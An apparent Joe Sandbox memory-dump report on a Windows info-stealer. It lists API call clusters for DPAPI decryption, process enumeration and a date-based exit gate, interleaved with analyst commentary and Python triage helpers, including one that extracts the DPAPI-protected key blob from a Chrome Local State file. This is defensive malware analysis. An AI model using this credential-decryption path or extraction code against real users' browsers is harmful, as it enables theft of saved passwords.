                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: \u$\u${${$}$}
                                    • API String ID: 0-582841131
                                    • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction ID: 7ef5782549138843efd792637d1ac7f0242673105180e72ccff93b08692e09c8
                                    • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction Fuzzy Hash: D6417E12E19BD9C5CB058B7444A02AEBFB22FE6210F6D42AEC4DD1F3C2C774424AD3A5
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BDC971
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BDC97C
                                    • lstrcat.KERNEL32(?,00BF0B47), ref: 00BDCA43
                                    • lstrcat.KERNEL32(?,00BF0B4B), ref: 00BDCA57
                                    • lstrcat.KERNEL32(?,00BF0B4E), ref: 00BDCA78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: c452644a213b00d9954c6f0ff7d5ce1104e47d185da48b54186ffe5da3ea9ee7
                                    • Instruction ID: 82148cc3d6cbd58dd97608674fbc6971027e5d2e56f9a86e2868c9a35ee15c0e
                                    • Opcode Fuzzy Hash: c452644a213b00d9954c6f0ff7d5ce1104e47d185da48b54186ffe5da3ea9ee7
                                    • Instruction Fuzzy Hash: C74150B590421EDFDB10DFA0DD89BFEFBB8AB48304F1041A9E509A7290D7706A84CF91
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00BE6C0C
                                    • sscanf.NTDLL ref: 00BE6C39
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BE6C52
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BE6C60
                                    • ExitProcess.KERNEL32 ref: 00BE6C7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: dcc8db746d3aa194636aa9ae4f0abc776f887cf419962fc86ad5ad847fd525ea
                                    • Instruction ID: d23e67a33fb52e19316481ecf89d24589d7483242ef4f1241f11942e8bfb69a2
                                    • Opcode Fuzzy Hash: dcc8db746d3aa194636aa9ae4f0abc776f887cf419962fc86ad5ad847fd525ea
                                    • Instruction Fuzzy Hash: 1B21BBB5D14208AFCB04DFE5E845AEEB7B9FF4C300F04856AE516B3250EB34A608CB65
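GetSystemTime, sscanf, two SystemTimeToFileTime calls and ExitProcess in one function is the shape of a build-expiry gate: the current time and a date string parsed out of the binary are both converted to FILETIME and compared, and the process exits once the build is past its date. The report lists only the calls, so that reading is an interpretation, but it matters for triage: a sample run after its date exits quietly and looks like sandbox evasion when it is simply expired, and the remedy is to set the analysis VM clock back. The Python below is an added helper, not the sample's code. It reimplements the FILETIME arithmetic so the embedded date can be turned into the value the comparison sees and back; the date formats it accepts are assumed, since the report does not show the sscanf format string, and the date in the usage block is constructed.

```python
import re
from datetime import datetime, timedelta, timezone
from typing import Optional

# FILETIME counts 100 ns intervals since 1601-01-01 00:00:00 UTC, which is
# exactly what SystemTimeToFileTime produces from a SYSTEMTIME.
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def utc(year: int, month: int, day: int, hour: int = 0, minute: int = 0, second: int = 0) -> datetime:
    """Aware UTC datetime: the stand-in for a SYSTEMTIME filled by GetSystemTime."""
    return datetime(year, month, day, hour, minute, second, tzinfo=timezone.utc)


def system_time_to_file_time(dt: datetime) -> int:
    """Equivalent of SystemTimeToFileTime for an aware datetime."""
    delta = dt.astimezone(timezone.utc) - _EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def file_time_to_datetime(ft: int) -> datetime:
    """Inverse, for FILETIME values read out of a debugger or a memory dump."""
    return _EPOCH_1601 + timedelta(microseconds=ft // 10)


def parse_kill_date(text: str) -> datetime:
    """sscanf-style parse of the embedded date string.

    Assumed formats: 'YYYY-MM-DD' or 'DD.MM.YYYY'; the real format string of
    this sample is not visible in the report. Returns midnight UTC of that day.
    """
    text = text.strip()
    m = re.fullmatch(r"(\d{4})-(\d{1,2})-(\d{1,2})", text)
    if m:
        year, month, day = map(int, m.groups())
    else:
        m = re.fullmatch(r"(\d{1,2})\.(\d{1,2})\.(\d{4})", text)
        if not m:
            raise ValueError(f"unrecognised date string: {text!r}")
        day, month, year = map(int, m.groups())
    return utc(year, month, day)


def build_expired(kill_date: str, now: Optional[datetime] = None) -> bool:
    """True when the FILETIME of 'now' lies past the FILETIME of the parsed date,
    the branch on which the observed code path would reach ExitProcess."""
    now = now or datetime.now(timezone.utc)
    return system_time_to_file_time(now) > system_time_to_file_time(parse_kill_date(kill_date))


if __name__ == "__main__":
    kill = "2024-10-31"  # constructed date, not the one embedded in the analysed sample
    ft = system_time_to_file_time(parse_kill_date(kill))
    print(f"kill date {kill} -> FILETIME 0x{ft:016X} ({ft})")
    print("expired on the current clock:", build_expired(kill))
    print("set the analysis VM clock before", file_time_to_datetime(ft).date(), "to get past this gate")
```

The 64-bit FILETIME is usually compared as two DWORDs in 32-bit code (CompareFileTime or a manual high/low compare), so when locating the check in a debugger look for the high DWORD comparison first.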
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BD72AD
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD72B4
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BD72E1
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BD7304
                                    • LocalFree.KERNEL32(?), ref: 00BD730E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: ff5d7ef310c1a362ec484cbb2df5e0152fb1fedf06782201118cf5214868010e
                                    • Instruction ID: 28eb8ef843acfc094d2434e02d21d6d1249e9bd039130dc9b3dc0653fee2c75f
                                    • Opcode Fuzzy Hash: ff5d7ef310c1a362ec484cbb2df5e0152fb1fedf06782201118cf5214868010e
                                    • Instruction Fuzzy Hash: F1012DB5A44208BFDB10DBA4CC45F9D77B8AB48B00F104045FB45BA2D0DAB0BA058B64
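GetProcessHeap followed by RtlAllocateHeap, CryptUnprotectData, WideCharToMultiByte and LocalFree is the DPAPI decryption path stealers use for secrets that a browser or Windows protected with the logged-on user's credentials. The 8 and 0x400 shown next to GetProcessHeap read naturally as the HEAP_ZERO_MEMORY flag and size of the RtlAllocateHeap call that follows, WideCharToMultiByte converts the decrypted UTF-16 into that 0x400-byte buffer, and the CryptUnprotectData arguments show NULL optional entropy and dwFlags 1 (CRYPTPROTECT_UI_FORBIDDEN), so the call succeeds silently in the user's own context with no elevation. For response, the useful property is that the blob handed to CryptUnprotectData names the master key it was protected with, which identifies the file under %APPDATA%\Microsoft\Protect\<SID>\ that the decryption depended on. The Python below is an added triage helper, not the sample's code: it parses the DPAPI_BLOB header and, as one common input, pulls the blob out of a Chrome Local State file (the DPAPI-prefixed os_crypt.encrypted_key). The Local State fragment and master key GUID are constructed; the report does not show which blobs this sample decrypted.

```python
import base64
import json
import struct
import uuid
from typing import Dict

# Provider GUID found at offset 4 of every blob produced by CryptProtectData.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256", 0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}


class _Cursor:
    """Sequential little-endian reader that fails loudly on truncation."""

    def __init__(self, buf: bytes):
        self.buf, self.pos = buf, 0

    def take(self, n: int) -> bytes:
        if self.pos + n > len(self.buf):
            raise ValueError("truncated DPAPI blob")
        chunk = self.buf[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def dword(self) -> int:
        return struct.unpack("<I", self.take(4))[0]

    def guid(self) -> uuid.UUID:
        return uuid.UUID(bytes_le=self.take(16))

    def lv(self) -> bytes:  # DWORD length followed by that many bytes
        return self.take(self.dword())


def parse_dpapi_blob(blob: bytes) -> Dict[str, object]:
    """Walk the DPAPI_BLOB header: version, provider GUID, master key GUID, flags,
    description, cipher and hash ALG_IDs, then the length-prefixed salt, HMAC key,
    HMAC, ciphertext and signature fields."""
    c = _Cursor(blob)
    version, provider = c.dword(), c.guid()
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (bad version or provider GUID)")
    mk_version, master_key, flags = c.dword(), c.guid(), c.dword()
    description = c.lv().decode("utf-16-le").rstrip("\x00")
    alg_crypt, alg_crypt_bits = c.dword(), c.dword()
    salt = c.lv()
    c.lv()  # pbHmacKey, left empty by current Windows versions
    alg_hash, alg_hash_bits = c.dword(), c.dword()
    hmac = c.lv()
    ciphertext = c.lv()
    signature = c.lv()
    return {
        "master_key": str(master_key),  # names %APPDATA%\Microsoft\Protect\<SID>\<guid>
        "master_key_version": mk_version,
        "flags": flags,
        "description": description,
        "cipher": CALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "cipher_bits": alg_crypt_bits,
        "hash": CALG_NAMES.get(alg_hash, hex(alg_hash)),
        "hash_bits": alg_hash_bits,
        "salt_len": len(salt),
        "hmac_len": len(hmac),
        "ciphertext_len": len(ciphertext),
        "signature_len": len(signature),
    }


def chrome_encrypted_key_blob(local_state_json: str) -> bytes:
    """os_crypt.encrypted_key in Chrome's Local State is base64 of b'DPAPI' + blob;
    the bytes after the prefix are exactly the buffer a stealer hands to CryptUnprotectData."""
    raw = base64.b64decode(json.loads(local_state_json)["os_crypt"]["encrypted_key"])
    if not raw.startswith(b"DPAPI"):
        raise ValueError("encrypted_key does not carry the DPAPI prefix")
    return raw[len(b"DPAPI"):]


def _lv(b: bytes) -> bytes:
    return struct.pack("<I", len(b)) + b


def build_sample_blob(master_key: uuid.UUID, ciphertext: bytes) -> bytes:
    """Assemble a syntactically valid blob around placeholder bytes. It cannot be
    decrypted (salt, HMAC and signature are zeros); it only exercises the parser."""
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1) + master_key.bytes_le + struct.pack("<I", 0)
            + _lv(b"\x00\x00")                                # empty, NUL-terminated description
            + struct.pack("<II", 0x6610, 256) + _lv(bytes(32)) + _lv(b"")
            + struct.pack("<II", 0x800E, 512) + _lv(bytes(32))
            + _lv(ciphertext) + _lv(bytes(64)))


# Constructed Local State fragment with a made-up master key GUID; not data from the sample.
SAMPLE_MASTER_KEY = uuid.UUID("7a9b3c1d-2e4f-4a5b-8c6d-0e1f2a3b4c5d")
SAMPLE_LOCAL_STATE = json.dumps({"os_crypt": {"encrypted_key": base64.b64encode(
    b"DPAPI" + build_sample_blob(SAMPLE_MASTER_KEY, bytes(48))).decode("ascii")}})


def triage_local_state(local_state_json: str) -> Dict[str, object]:
    info = parse_dpapi_blob(chrome_encrypted_key_blob(local_state_json))
    info["master_key_file"] = r"%APPDATA%\Microsoft\Protect\<SID>\{}".format(info["master_key"])
    return info


if __name__ == "__main__":
    for key, value in triage_local_state(SAMPLE_LOCAL_STATE).items():
        print(f"{key:20} {value}")
```

The master key GUID is the pivot for incident response: on the victim host it selects the master key file whose decryption the stealer relied on, and in an offline investigation it tells you which master key (and therefore which user password or domain backup key) is needed to reproduce what was exfiltrated.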
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BE97AE
                                    • Process32First.KERNEL32(00BF0ACE,00000128), ref: 00BE97C2
                                    • Process32Next.KERNEL32(00BF0ACE,00000128), ref: 00BE97D7
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 00BE97EC
                                    • CloseHandle.KERNEL32(00BF0ACE), ref: 00BE980A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 810d474e1a545852f6c8d4379ec7b954aa13178e4dbf89d18e07dc8b4776b7a8
                                    • Instruction ID: 05db68d647fa6659bcc4c96149b8e2be46adf4ce32f4276360b708dfe16a9770
                                    • Opcode Fuzzy Hash: 810d474e1a545852f6c8d4379ec7b954aa13178e4dbf89d18e07dc8b4776b7a8
                                    • Instruction Fuzzy Hash: 50010075A14208AFDB20DFA6CD44BDDB7F8FB4D700F1045C8E545A6250D734AA48DF60
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <7\h$huzx
                                    • API String ID: 0-2989614873
                                    • Opcode ID: e4593669e53e20df4336ba31952ce2d970cc32ece5398df97f5936804979b219
                                    • Instruction ID: d3c33915c06b5ebb29559d83aea98fd01575ef85b14b6fe61ec40438d458658a
                                    • Opcode Fuzzy Hash: e4593669e53e20df4336ba31952ce2d970cc32ece5398df97f5936804979b219
                                    • Instruction Fuzzy Hash: 6B63477241EBD81EC727CB3047B65617FA6FA132103194ACECBC18F5B3C6949A1AE356
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Avg$__W$tV?=$ow?
                                    • API String ID: 0-3191419669
                                    • Opcode ID: 9bce75534edb2da4e45972c69b2d4bf1dfde47a5d7b0c0f0a443dc772080e421
                                    • Instruction ID: f65c7bec86295e5f87ac9d3b4c6aea4299f220d6ebf44b3514498c0bb3491fcc
                                    • Opcode Fuzzy Hash: 9bce75534edb2da4e45972c69b2d4bf1dfde47a5d7b0c0f0a443dc772080e421
                                    • Instruction Fuzzy Hash: ADB2F3F360C2049FE304AE29EC8567AFBE9EF94360F16493DEAC5C3744E63598418796
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00BD51D4,40000001,00000000,00000000,?,00BD51D4), ref: 00BE9050
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: f2623366260d810685f14314f9ea6cdb38b73a486db4cf55cb093121548afafc
                                    • Instruction ID: 40ce91183601b627175ac25e7f222107909c82009c273f8ec7d09d553d3418f5
                                    • Opcode Fuzzy Hash: f2623366260d810685f14314f9ea6cdb38b73a486db4cf55cb093121548afafc
                                    • Instruction Fuzzy Hash: A211F570204248FFDB00CF66DC84BAA33E9EF8A350F508488FA198B251D772E9458BA0
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BD4F3E,00000000,00000000), ref: 00BDA23F
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00BD4F3E,00000000,?), ref: 00BDA251
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BD4F3E,00000000,00000000), ref: 00BDA27A
                                    • LocalFree.KERNEL32(?,?,?,?,00BD4F3E,00000000,?), ref: 00BDA28F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
